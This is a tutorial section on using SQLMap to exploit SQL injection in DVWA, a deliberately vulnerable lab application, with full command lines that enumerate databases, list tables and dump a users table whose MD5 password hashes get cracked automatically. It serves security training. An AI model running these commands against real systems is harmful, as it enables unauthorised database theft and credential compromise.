5.7. Exploiting SQLi Using SQLMap

Manual searching and testing for SQLi vulnerabilities can be time-consuming. Moreover, for each DBMS, you need to find appropriate SQL statements, as the syntax and built-in functions may differ. Of course, you can create a list of all possible SQL statements and then run fuzzing. However, the main task of fuzzing is to find and confirm the vulnerability. The actual exploitation or hacking will have to be done manually or with the help of other specialized programs. There are programs that allow you to combine all these steps and perform complex tasks for you, but most of them are paid and quite expensive.

However, there is an alternative in the form of a free program called SQLMap (website), which is already installed in Kali. The program has many options that are available through the sqlmap -hh command. SQLMap allows you to perform the following operations:

  • Extract complete information about the DBMS and the type of operating system.
  • Extract the contents of the database.
  • Crack passwords. If the database contains hashes, the program will automatically try to crack them.
  • Execute operating system commands.
  • Get an interactive shell to control the vulnerable server. Usually, this option rarely works because a special file must be written to the vulnerable server, which will then be executed. Therefore, you need to know the directory/folder that has write file permissions. Additionally, the DBMS session user must have the necessary privileges.

Let's look at how SQLMap works using the DVWA application as an example. Open the application, log in, and select the SQL Injection option. Enter any digit (e.g., 1) and intercept the request in Burp Suite. You need to copy the URL and the Cookie because you had to log in to the site:

Captured request with Cookie

Now, using the available data, let's run SQLMap:

sqlmap –url=http://10.0.2.15/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit –cookie=”security=low; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=qje743rmifb453hrs0rsf31mc7; security_level=0” –method GET –data=”id=1&Submit=Submit” -p ”id” –dbs –batch

where

--url – the tested URL,

--cookie – the necessary cookies,

--method – the HTTP method used,

--data – the data being sent,

-p – the tested parameters. If there are multiple parameters, list them all separated by commas,

--dbs – to get the database name,

--batch – during testing, the program prompts for interactive user interaction. To use default values, you can use the --batch option, but in some cases, it's better to avoid it.

Here's what we have:

Successful attack in SQLMap

The program has provided quite a bit of data, including SQL expressions that worked. In our case, four exploitation methods were successful. At the bottom, the list of databases is displayed.

Now, let's try to look inside the database named 'dvwa.' To start, let's see what tables it contains:

sqlmap –url=http://10.0.2.15/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit –cookie=”security=low; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=qje743rmifb453hrs0rsf31mc7; security_level=0” –method GET –data=”id=1&Submit=Submit” -p ”id” -D dvwa –tables –batch

where

-D – specifies the name of the database,

--tables – displays the list of tables:

Retrieving tables with SQLMap

Let's check the 'users' table:

sqlmap –url=http://10.0.2.15/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit –cookie=”security=low; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=qje743rmifb453hrs0rsf31mc7; security_level=0” –method GET –data=”id=1&Submit=Submit” -p ”id” -D dvwa -T users --dump –batch

where

-T – specifies the name of the table being examined,

--dump – instructs to extract all the information:

Dumped info from database with SQLMap

The table contains usernames and hashes of their passwords. The program automatically cracked the hashes to obtain the passwords. Since MD5 was used as the hashing function, the cracking process took only a few seconds. When using a stronger hashing function, it is recommended not to use the --batch option.

As mentioned earlier, the program can access the file and operating systems of the vulnerable server using the options listed below:

SQLMap options

However, everything depends on the access rights of the database session user and file system access settings.